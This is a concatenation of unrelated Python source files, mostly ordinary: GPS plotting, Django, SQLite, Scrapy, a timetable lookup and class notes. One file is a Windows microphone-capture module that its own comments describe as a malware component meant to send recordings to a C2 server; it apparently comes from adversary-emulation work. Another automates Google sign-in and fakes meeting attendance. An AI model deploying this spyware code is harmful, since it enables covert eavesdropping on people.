        ax.ticklabel_format(useOffset=False)
        plt.xlabel('Longitude')
        plt.ylabel('Latitude')
        plt.savefig('track_plot.png')
        plt.show()

    def export_kml(self):
        """Write the track (lat, lon, altitude per fix) to export.kml."""
        print('Creating the file export.kml')
        # width: defines the line width, use e.g. 0.1 - 1.0
        kml = kmlclass()
        kml.begin('export.kml', 'Example', 'Example on the use of kmlclass', 0.1)
        # color: use 'red' or 'green' or 'blue' or 'cyan' or 'yellow' or 'grey'
        # altitude: use 'absolute' or 'relativeToGround'
        kml.trksegbegin('', '', 'red', 'absolute')
        for i, x in self.df.iterrows():
            kml.trkpt(x[2], x[4], x[9])
        kml.trksegend()
        kml.end()
if __name__ == "__main__":
    # Example run against the drone flight log (kept for reference):
    # nmea = nmea_class()
    # nmea.import_file('nmea_trimble_gnss_eduquad_flight.txt')
    # nmea.print_data()
    # nmea.plot_height_over_time()
    # nmea.plot_number_of_satellites_over_time()
    # nmea.plot_track()
    # nmea.export_kml()
    # Active run: analyze the 24 h static u-blox recording.
    nmea = nmea_class()
    nmea.import_file('nmea_ublox_neo_24h_static.txt')
    nmea.print_data()
    nmea.plot_quality_of_signal_over_time()
|
24,172 | 317bc0e592ab2d1fa26f8fd7333142a494c695a7 | ##############################################################################
#
# Copyright (C) 2011 - 2013 Therp BV (<http://therp.nl>).
# Copyright (C) 2011 Smile (<http://smile.fr>).
# All Rights Reserved
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Direct Debit',
'version': '7.0.2.134',
'license': 'AGPL-3',
'author': ['Therp BV', 'Smile'],
'website': 'https://launchpad.net/banking-addons',
'category': 'Banking addons',
'depends': ['account_banking_payment_export'],
'data': [
'view/account_payment.xml',
'view/account_invoice.xml',
'view/payment_mode.xml',
'view/payment_mode_type.xml',
'workflow/account_invoice.xml',
'data/account_payment_term.xml',
],
'description': '''
This module adds support for direct debit orders, analogous to payment orders.
A new entry in the Accounting/Payment menu allow you to create a direct debit
order that helps you to select any customer invoices for you to collect.
This module explicitely implements direct debit orders as applicable
in the Netherlands. Debit orders are advanced in total by the bank.
Amounts that cannot be debited or are canceled by account owners are
credited afterwards. Such a creditation is called a storno. This style of
direct debit order may not apply to your country.
This module depends on and is part of the banking addons for OpenERP. This set
of modules helps you to provide support for communications with your local
banking institutions. The banking addons are a continuation of Account Banking
Framework by Edusense BV. See https://launchpad.net/banking-addons.
''',
'installable': True,
}
|
24,173 | 26ccab58cc4f7f3ad93201aec60fadeb7f0c46cf | import socket
import sys
import select
# UDP calculator client: reads 7 "operand operator operand" lines from the
# text file given on the command line, sends each to a local UDP server and
# prints the reply. The receive timeout starts at 0.1 s and doubles on each
# failed attempt; past 2 s the request is abandoned.
a = sys.argv
if len(a) != 2:
    print("NO TEXT FILE GIVEN OR TOO MANY PARAMETERS")
    quit()
d = 0.1  # current receive timeout in seconds
f = None
try:
    f = open(a[1], "r")
# NOTE(review): bare except — catches everything, not just OSError; confirm
# narrowing is safe before changing behavior.
except:
    print("INVALID TEXT FILE")
    quit()
data = f.read()
data = data.splitlines()
arr = []
# Only the first 7 lines of the file are used.
end = len(data)
if len(data) > 7:
    end = 7
for i in range(0,end):
    arr.append(data[i].split())
serverAddressPort = ("127.0.0.1", 65432)
bufferSize = 1024
if len(arr) < 7:
    print("INVALID TEXT FILE: AT LEAST 7 LINES NEEDED")
    quit()
for i in arr:
    if len(i) != 3:
        print("INVALID TEXT FILE: A LINE DOES NOT CONTAIN EXACTLY 3 VALUES")
        quit()
i = 0
while i <= 6:
    # print(i, d)
    UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
    # Request format: "operand1 operator operand2" (fields as read from file).
    temp = str(arr[i][0]) + " " + str(arr[i][1]) + " " + str(arr[i][2])
    UDPClientSocket.sendto(temp.encode(), serverAddressPort)
    UDPClientSocket.settimeout(d)
    restart = False   # retry this same request with a doubled timeout
    passBy = False    # give up on this request entirely
    try:
        data = UDPClientSocket.recvfrom(bufferSize)
    # NOTE(review): bare except — presumably meant to catch socket.timeout;
    # as written any error triggers the retry logic.
    except:
        # print(temp)
        d = 2*d
        if d>2:
            print("ERROR: FAILURE SERVER IN TROUBLE... " + str(arr[i][1]) + " " + str(arr[i][0]) + " " + str(arr[i][2]) + " NOT CALCULATED")
            passBy = True
        else:
            print("ERROR: WAITTIME | REATTEMPTING REQUEST...")
            restart = True
    # NOTE(review): on retry the socket is never closed (the `continue`
    # skips the close below) — a descriptor leak worth fixing.
    if restart:
        continue
    if not passBy:
        data = data[0]
        data = data.decode()
        # Replies start with a 3-char status code; "200" means success and
        # the result begins at offset 5.
        if data[0:3] == "200":
            cur = (data[5:len(data)])
            print("The result of " + str(arr[i][1]) + " " + str(arr[i][0]) + " " + str(arr[i][2]) + " is " + cur)
        else:
            print("ERROR: " + str(arr[i][1]) + " " + str(arr[i][0]) + " " + str(arr[i][2]) + " is an INVALID INPUT")
    UDPClientSocket.close()
    i+=1
|
24,174 | 239b83d8bd4ce2cd1eefbba2ae7eb6ecc7e577bd | import pyaudio
import audioop
from os import path
# This module implements the Audio Capture technique (under the Collection tactic).
# The module captures the audio using a simple & default API called MME, which is found on most/all Windows machines.
# The module then compresses the audio to ADPCM encoding to save space on the target machine.
# The files can be later sent to a remote C2 server, then extracted back to linear PCM and played.
# Some restrictions:
# 1) The module is intended to be used on a Windows machine with the default MME API.
# 2) However, it is just a few lines of code away from working with Linux/Mac, thanks to the PyAudio library.
# 3) The module is potentially a part of a bigger malware that invokes audio grabs on demand then sends them out.
class Recorder:
    """Audio-capture demo: records *duration* seconds from the default MME
    input device (Windows), compresses the linear PCM to ADPCM and writes it
    to ADPCM_OUTPUT_FILENAME."""
    RATE = 44100  # sample rate in Hz
    ADPCM_OUTPUT_FILENAME = "output.adpcm"

    def __init__(self, duration=5):
        # duration: recording length in seconds
        self.duration = duration
        self.stream = None
        self.audio = pyaudio.PyAudio()
        self.format = pyaudio.paInt32
        # bytes per sample for the chosen format (4 for paInt32)
        self.sample_size = self.audio.get_sample_size(self.format)
        self.channels = 2

    def attack(self):
        """Run the full capture: check preconditions, record, verify output.
        Returns True when the output file exists and is large enough."""
        self.assert_preconditions()
        self.record()
        res = self.assert_postconditions()
        self.cleanup()
        return res

    # Make sure the MME API and 1 input device are available
    def assert_preconditions(self):
        device = self.audio.get_default_input_device_info()
        if self.get_host_api_name_of_device(device) == 'MME':
            # do not ask for more channels than the device supports
            self.channels = min(device.get('maxInputChannels'), self.channels)
        else:
            raise RuntimeError("MME API not detected")

    def get_host_api_name_of_device(self, device):
        """Return the host-API name (e.g. 'MME') of a PyAudio device dict."""
        return self.audio.get_host_api_info_by_index(device['hostApi'])['name']

    def record(self):
        """Open the stream, capture frames, then compress and write them."""
        self.open_stream()
        frames = self.read_stream()
        self.close_stream()
        self.write(self.compress(frames))

    def open_stream(self):
        # NOTE(review): frames_per_buffer is set to the *byte* size of one
        # sample (4), which is an unusually tiny buffer — confirm a larger
        # chunk size was not intended.
        self.stream = self.audio.open(format=self.format, channels=self.channels,
                                      rate=self.RATE, input=True, frames_per_buffer=self.sample_size)

    def read_stream(self):
        # NOTE(review): RATE / sample_size * duration mixes samples and
        # bytes; together with the read size this determines the actual
        # captured duration — verify against a real device.
        frames = []
        for i in range(0, int(self.RATE / self.sample_size * self.duration)):
            frames.append(self.stream.read(self.sample_size))
        return frames

    def close_stream(self):
        self.stream.stop_stream()
        self.stream.close()
        self.audio.terminate()

    def compress(self, frames):
        """Lazily convert linear PCM frames to ADPCM, threading the codec
        state from one frame to the next."""
        state = (None, None)
        for frame in frames:
            state = audioop.lin2adpcm(frame, self.sample_size, state[1])
            yield state[0]

    def write(self, compressed):
        with open(self.ADPCM_OUTPUT_FILENAME, 'wb') as f:
            f.write(b''.join(compressed))

    # Check if the file exists and whether it's in the correct size
    def assert_postconditions(self):
        try:
            # divided by 8 for compression
            bytes_per_second = self.RATE * self.sample_size * self.channels / 8
            return path.getsize(self.ADPCM_OUTPUT_FILENAME) >= bytes_per_second * self.duration
        except FileNotFoundError:
            return False

    def cleanup(self):
        pass  # In context of a full malware, the output file will be deleted only after sending the data out
# Module-level demo: record immediately on import and print whether the
# captured file passed the size check.
recorder = Recorder()
print(recorder.attack())
|
24,175 | 5d593ae5ee06fd7108bb4d28f7ce2a384ca156ad | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-04-29 03:43
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django 1.11 migration: adds the CabRegister model
    (agency contact and bank details) and repoints RegisterVehicle at it,
    replacing the old CabRegisteration model."""

    dependencies = [
        ('cabbooking', '0007_cabregisteration_registervehicle'),
    ]

    operations = [
        migrations.CreateModel(
            name='CabRegister',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('agency_name', models.CharField(max_length=200, verbose_name='Agency Name')),
                ('full_name', models.CharField(max_length=200, verbose_name='Full Name')),
                ('mobile_no', models.CharField(max_length=200, verbose_name='Mobile No')),
                ('email_id', models.CharField(max_length=200, verbose_name='Email Id')),
                ('bank_name', models.CharField(max_length=200, verbose_name='Bank Name')),
                ('account_no', models.CharField(max_length=200, verbose_name='Account No')),
                ('name_in_account', models.CharField(max_length=200, verbose_name='Account Name')),
                ('ifsc_code', models.CharField(max_length=200, verbose_name='IFSC Code')),
                ('branch', models.CharField(max_length=200, verbose_name='Branch')),
                ('address', models.TextField(verbose_name='Address')),
            ],
            options={
                'verbose_name': 'Cab Registeration',
                'verbose_name_plural': 'Cab Registerations',
            },
        ),
        migrations.AlterField(
            model_name='registervehicle',
            name='cabregister',
            field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='cabbooking.CabRegister'),
        ),
        migrations.DeleteModel(
            name='CabRegisteration',
        ),
    ]
|
24,176 | 7b0a64c90ed270a72b04da556ebb8bcabfac735e | from collections import defaultdict
import itertools
from typing import (
Union,
List,
Tuple,
DefaultDict,
Generator,
)
from .exceptions import InvalidTableConfiguration
from .column import SQLiteColumn
from .enums import SQLiteConstraint
from .utils import SQLiteTemplate
class SQLiteTable(object):
    """Builds CREATE TABLE and trigger SQL statements for one SQLite table."""

    schema_template = SQLiteTemplate(
        'CREATE TABLE $exists $table_name ($column_defs)'
    )
    unique_template = SQLiteTemplate('UNIQUE ($fields)')
    trigger_template = SQLiteTemplate(
        'CREATE TRIGGER $trigger_name $when $event ON $table_name BEGIN $expr; END'
    )

    def __init__(
        self,
        table_name: str,
        columns: Union[List[SQLiteColumn], Tuple[SQLiteColumn], tuple] = (),
        unique_together: Union[Tuple[str], Tuple[Tuple], Tuple] = (),
        raise_exists_error: bool = False,
    ):
        self.table_name = table_name
        self.columns = {column.column_name: column for column in columns}
        self.unique_together = unique_together
        self.raise_exists_error = raise_exists_error
        # Materialize as a list: the previous `filter(...)` returned a
        # one-shot iterator that was exhausted after the first call to
        # get_foreign_key_constraints_sql(), silently dropping FK
        # constraints from any later schema build.
        self.foreign_key_columns = [
            column for column in columns if column.is_foreign_key
        ]
        # First primary-key column, or None when the table has none
        # (SQLite then falls back to the implicit rowid).
        self.primary_key_col = next(
            (column for column in self.columns.values() if column.is_primary_key),
            None,
        )

    def __repr__(self) -> str:
        template = (
            '{!s}({!r}, columns={!r}, unique_together={!r}, raise_exists_error={!r})'
        )
        return template.format(
            self.__class__.__name__,
            self.table_name,
            tuple(self.columns.values()),
            self.unique_together,
            self.raise_exists_error,
        )

    def __str__(self) -> str:
        return '<{!s}: {!r}>'.format(self.__class__.__name__, self.table_name)

    def get_primary_key_col_name(self) -> str:
        """Name of the primary-key column, or 'rowid' when none is defined."""
        if self.primary_key_col is not None:
            return self.primary_key_col.column_name
        return 'rowid'

    def validate_columns(self) -> None:
        """Raise InvalidTableConfiguration when the table has no columns."""
        if not self.columns:
            raise InvalidTableConfiguration('Cannot create table without columns')

    def get_unique_constraints_sql(self) -> Union[Generator, tuple]:
        """Yield one UNIQUE(...) clause per group in unique_together.

        Accepts either a single flat tuple of field names or a tuple of
        such tuples; returns an empty tuple when nothing is configured.
        """
        try:
            if isinstance(self.unique_together[0], str):
                unique_sets: Tuple = (self.unique_together,)
            else:
                unique_sets = self.unique_together
        except IndexError:
            return ()
        return (
            self.unique_template.substitute(fields=', '.join(x)) for x in unique_sets
        )

    def get_foreign_key_constraints_sql(self) -> Generator:
        """Yield the FOREIGN KEY clause for each foreign-key column."""
        return (x.fk_constraint_to_sql() for x in self.foreign_key_columns)

    def get_column_defs_sql(self) -> str:
        """Comma-joined column definitions plus FK and UNIQUE constraints."""
        return ', '.join(
            itertools.chain(
                (x.definition_to_sql() for x in self.columns.values()),
                self.get_foreign_key_constraints_sql(),
                self.get_unique_constraints_sql(),
            )
        )

    def get_schema_definition_subs(self) -> dict:
        """Template substitutions for schema_template; empty-string default
        keeps unused placeholders blank."""
        self.validate_columns()
        substitutions: DefaultDict[str, str] = defaultdict(str)
        substitutions['table_name'] = self.table_name
        substitutions['column_defs'] = self.get_column_defs_sql()
        if not self.raise_exists_error:
            substitutions['exists'] = SQLiteConstraint.IF_NOT_EXISTS.value
        return substitutions

    def schema_to_sql(self) -> str:
        """Render the full CREATE TABLE statement."""
        return self.schema_template.substitute(self.get_schema_definition_subs())

    def triggers_to_sql(self) -> Generator:
        """Yield an AFTER UPDATE trigger statement for every column that
        requires one (e.g. auto-updated timestamp columns)."""
        for column in filter(lambda x: x.requires_trigger(), self.columns.values()):
            expr_template = SQLiteTemplate(column.trigger_expression_to_sql())
            substitutions = {
                'expr': expr_template.substitute(
                    {
                        'primary_key_col': self.get_primary_key_col_name(),
                        'table_name': self.table_name,
                    },
                ),
                'trigger_name': f'{self.table_name}_{column.column_name}_update',
                'when': 'AFTER',
                'event': 'UPDATE',
                'table_name': self.table_name,
            }
            yield self.trigger_template.substitute(substitutions)
|
24,177 | e2fe237f5c6f6b3f04660277f7ce3235356a0300 | # -*- coding:UTF-8 -*-
import scrapy
from housetype.items import HousetypeItem
from scrapy.http.request import Request
from scrapy.selector import Selector
import urlparse
def printhxs(hxs):
    # Concatenate a list of scrapy-extracted unicode fragments into a single
    # UTF-8 encoded (Python 2) byte string. The encode matters: callers
    # compare the result against UTF-8 str literals (e.g. "户型图" in
    # parse_layout), so the return type must stay a py2 str.
    # NOTE(review): Python 2 only — on Python 3, '' + bytes raises TypeError.
    a=''
    for i in hxs:
        a=a+i.encode('utf-8')
    return a
def change_image(images):
    """Rewrite thumbnail URLs to full-size ones: keep everything before the
    first '_cm' marker, then re-append the last 13 characters of the
    original URL (the image file name)."""
    return [url.split('_cm')[0] + url[-13:] for url in images]
def get_urls(startpage, endpage):
    """Build the leju.com search-page URLs for pages startpage..endpage-1."""
    base = "http://house.leju.com/zh/search/?page="
    return [base + str(page) for page in range(startpage, endpage)]
class MySpider(scrapy.Spider):
    """Crawl leju.com search pages, follow each property to its floor-plan
    ('huxing') section and collect floor-plan images into HousetypeItem."""
    name = "house"
    download_delay = 1  # seconds between requests (politeness throttle)
    allowed_domains = ["house.leju.com"]
    # start_urls = [
    #     "http://house.leju.com/zh/search/?page=1"
    # ]
    # crawl search-result pages 11..439
    start_urls=get_urls(11,440)

    def parse_item(self, response):
        """Extract one floor-plan page into a HousetypeItem."""
        sel = Selector(response)
        item = HousetypeItem()
        # page number is embedded in the URL as .../pN.shtml
        item['page'] = response.request.url.split('/p')[1].split('.shtml')[0]
        item['name'] = ''.join(sel.xpath('//div[@class="title"]/h1/text()').extract())
        item['image_url'] = change_image(sel.xpath('//div[@class="b_imgBox"]/img/@lsrc').extract())
        item['layout'] = sel.xpath('//div[@class="b_imgBox"]/img/@alt').extract()
        yield item

    def parse_pages(self, response):
        """Follow pagination of a floor-plan section; when there is no
        pagination, extract the single page directly (page '1')."""
        sel = Selector(response)
        pages = sel.xpath('//div[@class="b_pageBox clearfix z_pages"]/a/@href').extract()
        if pages:
            new_pages=list(set(pages))
            # NOTE(review): `new_pages.sort` is missing the call parentheses,
            # so the list is never actually sorted — confirm and fix.
            new_pages.sort
            for page_url in new_pages:
                yield Request(page_url ,callback=self.parse_item)
        else:
            item = HousetypeItem()
            item['page'] = '1'
            item['name'] = ''.join(sel.xpath('//div[@class="title"]/h1/text()').extract())
            item['image_url'] = change_image(sel.xpath('//div[@class="b_imgBox"]/img/@lsrc').extract())
            item['layout'] = sel.xpath('//div[@class="b_imgBox"]/img/@alt').extract()
            yield item

    def parse_layout(self, response):
        """From a property page, build the URL of its floor-plan section
        (the tab labelled 户型图 / 'floor plan')."""
        for sel in response.xpath('//div[@class="clearfix"]'):
            myurl = 'http://house.leju.com/'
            urls = printhxs(sel.xpath('ul/li/a/@href').extract())
            huxing = printhxs(sel.xpath('ul/li/a/text()').extract())
            if ("户型图" in huxing):
                layout_url = myurl + urls.split('/')[1] + "/huxing/"
                yield Request(layout_url ,callback=self.parse_pages)

    def parse(self, response):
        """From a search-result page, follow each listed property."""
        sel = response.xpath('//div[@id="ZT_searchBox"]')
        house_url = sel.xpath('div/div/a/@href').extract()
        for urls in house_url:
            yield Request(urls ,callback=self.parse_layout)
|
24,178 | 8754a0417199f06bf96a2eb2d778db4b8eed1bc0 | from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.parsers import JSONParser
from roomChatBackend.serializers import UserSerializers
from rest_framework import status
class SignUp(APIView):
    """Register a new user from the POSTed payload."""

    def post(self, request, format=None):
        serializer = UserSerializers(data=request.data)
        if not serializer.is_valid():
            # validation failed: echo the field errors back to the client
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
|
24,179 | e04baa30fd1bcaa00e3df94e0d4c835311450534 | # Intro to Cloudshell
## A virtual computer you get access to for free with a google account
## You get files and a terminal
### Do a quick tour of the parts
# Terminal - Bash
## The programming language of the terminal is called `bash` and most of its commands are abbreviations or acronyms.
# PWD - first command print working directory
## This command tells us where we are in the file system. It's called the working directory
# CHATSTORM - What are the ways you interact with the files and folders on a computer? open folders, files, make files, make folders, click inside of folders, etc.
#LS - abbreviation for list
## WATERFALL - How can you tell the difference between a file and a folder when looking at the output of ls?
#Making a directory (do this first so students can then cd into it and then make files there in an organized way)
## mkdir <directory_name>
## Let's make a directory called FintechFocus2021
#Change directory - cd <directory_path>
## Let's change into this new directory cd FintechFocus2021 and check the new working directory
## Waterfall - Copy and paste the output of pwd after cd'ing to FintechFocus2021 (if all students have the correct output, we are good to go!)
#Let's make another directory inside of the folder. Each day we will make a new directory for that day and include the day number.
## Make a new directory called 'day01' and CD into it. (take 30 seconds)
#Making files
## We'll use the command touch to create new files. We can list multiple file names w/ file extensions and make them simultaneously.
## Mini-challenge in breakout rooms: In your day01 folder, make a folder called "myFirstWebsite" and create a index.html style.css and script.js inside that new folder. Use ls and pwd to verify your work.
### Opening files
#### To open files available in your current working directory (use ls to see whats available) you'll use the command cloudshell open <file>.
### Check for time....removing and moving files and folders might be more beneficial as a full stretch where students look up how to do on their own. https://www.learnenough.com/command-line-tutorial/manipulating_files#sec-renaming_copying_deleting
## Possibly state that we can also move, delete, and rename files and folders.
# cp (copy) rm (remove/delete) mv (move)
##First Lab
### Framing: We're going to work on our first lab now. Labs are where the *real* learning happens: you will work closely with your classmates to reinforce concepts and solve challenges.
### To get the lab in your cloudshell, we will use git. We'll talk in more detail later on what git is and how we will use it for our own, original code, but for our purposes right now we will use this workflow. You'll cd into the directory of the day (in this case, day01) and you will run shared code that looks like 'git clone <url>' and then cd into that newly copied directory. Labs will include a readme file with directions and code for you to work with.
### During class, labs will take place in breakout rooms in pairs. When you get into the breakout room, decide who will be the driver (does the typing) and who will be the navigator (tells the driver what to type). Both students can contribute ideas on how to solve the challenge at hand. During labs, you will use a slack DM to exchange code back and forth for when you swap driver/navigator. Swapping driver/navigator should happen every 4-5 minutes (about two songs worth).
### In your breakout room, you can click a button to ask for help and one of us will be able to pop into your room. We can also broadcast messages to all of the rooms too. When we're in breakout rooms, use slack to send us messages.
### Most of the labs are designed in a way where there will always be more fun to be had in challenges than we will have the time for. The goal for no lab is for you to complete it! But if you do happen to complete a lab, we will always have extra fun additional labs for you to work.
### Okay, so here's the code for our first lab 'git clone https://github.com/upperlinecode/command-line-hidden-treasure.git'
### When you get to your breakout room, introduce yourself again, tell your partner your favorite color, give them a digital high five and have fun coding! |
24,180 | 8ad89dda2ee89cdffeb629d7d0f83565c1960f2c | class Solution:
# @param A : list of integers
# @param B : integer
# @return a list of list of integers
def fourSum(self, A, B):
ans_dict = {}
ans = []
A.sort()
#print(A)
for i in range(len(A)):
for j in range(i+1, len(A)):
sum_remain = B - A[i] - A[j]
k = j + 1
l = len(A) - 1
while k < l:
s = A[k] + A[l]
if s == sum_remain:
if (A[i],A[j],A[k],A[l]) not in ans_dict:
ans_dict[(A[i],A[j],A[k],A[l])] = 1
ans.append([A[i],A[j],A[k],A[l]])
k += 1
l -= 1
elif s < sum_remain:
k += 1
else:
l -= 1
return ans
|
24,181 | 6712df3f4dffee3c433b5ef0f31d02fe87be2446 | #pip install selenium
#pip install keyboard
# ---------------------------------------------------------------------------
# Google Meet auto-attendance bot (Selenium + keyboard).
# Flow: sign in to Google through the Stack Overflow OAuth page (Google
# blocks direct Selenium sign-in on its own login page), open
# meet.google.com, join a meeting with a user-supplied code, turn off
# camera/mic, then post an attendance message in the meeting chat.
# NOTE(review): find_element_by_xpath was removed in Selenium 4 -- this
# script requires Selenium 3.x, or porting to driver.find_element(By.XPATH,
# ...). The absolute XPaths and fixed sleep() timings are brittle and tied
# to the Google UI at the time of writing -- expect them to break.
# ---------------------------------------------------------------------------
from selenium import webdriver
#Download Chrome Driver With Respect To Your Chrome Browser's Version For Checking the version of chrome.go to the following site chrome://version
from time import sleep
from selenium.webdriver.common.keys import Keys
import keyboard
# Placeholder string: replace with the chromedriver executable's real path.
driver = webdriver.Chrome("#Path Of The Chromedriver")
driver.get("https://accounts.google.com/o/oauth2/auth/identifier?client_id=717762328687-iludtf96g1hinl76e4lc1b9a82g457nn.apps.googleusercontent.com&scope=profile%20email&redirect_uri=https%3A%2F%2Fstackauth.com%2Fauth%2Foauth2%2Fgoogle&state=%7B%22sid%22%3A1%2C%22st%22%3A%2259%3A3%3Abbc%2C16%3A1e10afed606ab28c%2C10%3A1622115835%2C16%3A4fd48bbee178515d%2Ca8a48ab5363d05a7b8d1430d3fc4e222fad429b6fd3847d13f1444f9d092fb71%22%2C%22cdl%22%3Anull%2C%22cid%22%3A%22717762328687-iludtf96g1hinl76e4lc1b9a82g457nn.apps.googleusercontent.com%22%2C%22k%22%3A%22Google%22%2C%22ses%22%3A%22fbe67d41c240458e9ae21024ca96307b%22%7D&response_type=code&flowName=GeneralOAuthFlow")#For Security Purpose Google Does Not Allow Selenium To Sign Account So We Need To Sign In With Stack OverFlow
sleep(2)
# --- Google sign-in: e-mail then password, each read from a local file ---
gmail = driver.find_element_by_xpath("/html/body/div[1]/div[1]/div[2]/div/div[2]/div/div/div[2]/div/div[1]/div/form/span/section/div/div/div[1]/div/div[1]/div/div[1]/input")
email = open("email.txt", "r").read()#Enter your gmail id in the email.txt file
gmail.send_keys(email)
gmail.send_keys(Keys.ENTER)
sleep(3)
pas = driver.find_element_by_xpath("/html/body/div[1]/div[1]/div[2]/div/div[2]/div/div/div[2]/div/div[1]/div/form/span/section/div/div/div[1]/div[1]/div/div/div/div/div[1]/div/div[1]/input")
passwd = open("Password.txt", "r").read()#enter your password in password.txt file
pas.send_keys(passwd)
pas.send_keys(Keys.ENTER)
sleep(3)
# --- Join the meeting: type the code the user enters on the console ---
driver.get("https://meet.google.com")
link = driver.find_element_by_xpath("/html/body/c-wiz/div/div[2]/div/div[1]/div[3]/div/div[2]/div[1]/label/input")
code = input("Enter Your Meeting Code(within 10sec): ")
sleep(10)
link.send_keys(code)
link.send_keys(Keys.ENTER)
sleep(4)
dis_btn = driver.find_element_by_xpath("/html/body/div/div[3]/div/div[2]/div[3]/div/span/span")
dis_btn.click()
sleep(5)
# Tab/Enter through the pre-join dialog buttons that Selenium cannot reach
# directly (the keyboard module drives real OS key events).
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("enter", do_press=True, do_release=True)
sleep(2)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("enter", do_press=True, do_release=True)
#if your cam is off as default skip the following parts(cam_off and mic_off)
sleep(3)
cam_off = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div/div/div[9]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[4]/div[2]/div/div")
cam_off.click()
sleep(2)
mic_off = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div/div/div[9]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[4]/div[1]/div/div/div")
mic_off.click()
sleep(3)
join_btn = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div/div/div[9]/div[3]/div/div/div[2]/div/div[1]/div[2]/div/div[2]/div/div[1]/div[1]/span")
join_btn.click()
sleep(60)#You Are Unable To Send The Following Attendance If The Host Does Not Allow You So Increase The Sleep Time As much As Possible
# --- Post the attendance message in the in-meeting chat panel ---
mess_box = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div[1]/div/div[9]/div[3]/div[1]/div[3]/div/div[2]/div[3]/span/span")
mess_box.click()
sleep(3)
chat_box = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div[1]/div/div[9]/div[3]/div[4]/div/div[2]/div[2]/div[2]/span[2]/div/div[4]/div[1]/div[1]/div[2]/textarea")
chat_box.send_keys("Your Name Present Sir/Mam")
chat_box.send_keys(Keys.ENTER)
sleep(2)
close = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div[1]/div/div[9]/div[3]/div[4]/div/div[2]/div[1]/div[2]/div/span/button/i")
close.click()
#https://meet.google.com/hyu-hbzv-uei
#if you face any error try increasing the sleep time or inspecting the particular element again
|
24,182 | 78316b5f7e2b65b946a8571418b4d6bbf08c3161 | import csv
from bot import getResponseData
def getTimeTable(context):
    """Return the timetable rows (as header-keyed dicts) whose university,
    semester and course match the answers stored in the chat *context*
    (slots 0, 1 and 2 of getResponseData). Matching is case-insensitive.
    """
    with open('timetable.csv') as fh:
        reader = csv.reader(fh, delimiter=',')
        header = []
        matches = []
        for idx, record in enumerate(reader):
            if idx == 0:
                # First row holds the column names used as dict keys.
                header = record
                continue
            # Same short-circuit order as the original: university,
            # then semester, then course.
            if (getResponseData(context, 0).lower() == record[0].lower()
                    and getResponseData(context, 1).lower() == record[4].lower()
                    and getResponseData(context, 2).lower() == record[1].lower()):
                matches.append(dict(zip(header, record)))
        return matches
def getTimeTablebyQPCode(qpcode):
    """Return every timetable row (as a dict keyed by the CSV header)
    whose QP-code column (the 6th column) equals *qpcode* exactly.

    Uses csv.DictReader instead of manually zipping the header row with
    each record: less code, same resulting dicts. Returns [] for an
    empty file (the original's behavior via its empty heading list).
    """
    with open('timetable.csv') as csv_file:
        reader = csv.DictReader(csv_file, delimiter=',')
        if not reader.fieldnames:
            # Empty file: no header, hence no rows to match.
            return []
        qp_field = reader.fieldnames[5]  # 6th column holds the QP code
        return [row for row in reader if qpcode == row[qp_field]]
def getAllCourseOfSemester(context):
    """Collect the distinct course names (column 2) offered by the
    university/semester taken from the chat *context*, in first-seen
    order. Matching is case-insensitive; the header row never matches.
    """
    with open('timetable.csv') as fh:
        reader = csv.reader(fh, delimiter=',')
        found = []
        for record in reader:
            # Guard clauses mirror the original condition order exactly
            # (dedupe check first, then university, then semester).
            if record[1] in found:
                continue
            if getResponseData(context, 0).lower() != record[0].lower():
                continue
            if getResponseData(context, 1).lower() != record[4].lower():
                continue
            found.append(record[1])
        return found
def getAllUniversities():
    """Return the distinct university names (first column) in first-seen
    order, skipping the CSV header row.

    Fix: the original appended the header cell to the list and sliced it
    off afterwards (``university[1:]``); that hack would also drop a real
    university whose name happened to equal the header text. Skipping
    row 0 explicitly avoids both the slice and that edge case.
    """
    with open('timetable.csv') as csv_file:
        reader = csv.reader(csv_file, delimiter=',')
        universities = []
        for index, row in enumerate(reader):
            if index == 0:
                continue  # header row, not data
            if row[0] not in universities:
                universities.append(row[0])
        return universities
def getAllSemesterOfUniversity(universityName):
    """List the distinct semesters (column 5) offered by *universityName*
    (case-insensitive match on column 1), in first-seen order."""
    wanted = universityName.lower()
    with open('timetable.csv') as fh:
        reader = csv.reader(fh, delimiter=',')
        result = []
        for record in reader:
            # Header row never matches a real university name, so it is
            # naturally excluded (as in the original).
            if record[4] not in result and record[0].lower() == wanted:
                result.append(record[4])
        return result
|
24,183 | a329f232ef36481685ef585cb8acb16a51e31224 | import numpy as np
import cv2
import sys
# Capture up to max_faces grayscale face crops from the webcam and save them
# as .pgm files under ../databases/<argv[1]>/ ('w' saves a crop, 'q' quits).
database_path = '../databases/' + str(sys.argv[1]) + '/'

face_cascade = cv2.CascadeClassifier('xml/haarcascade_frontalface_default.xml')

count_faces = 0
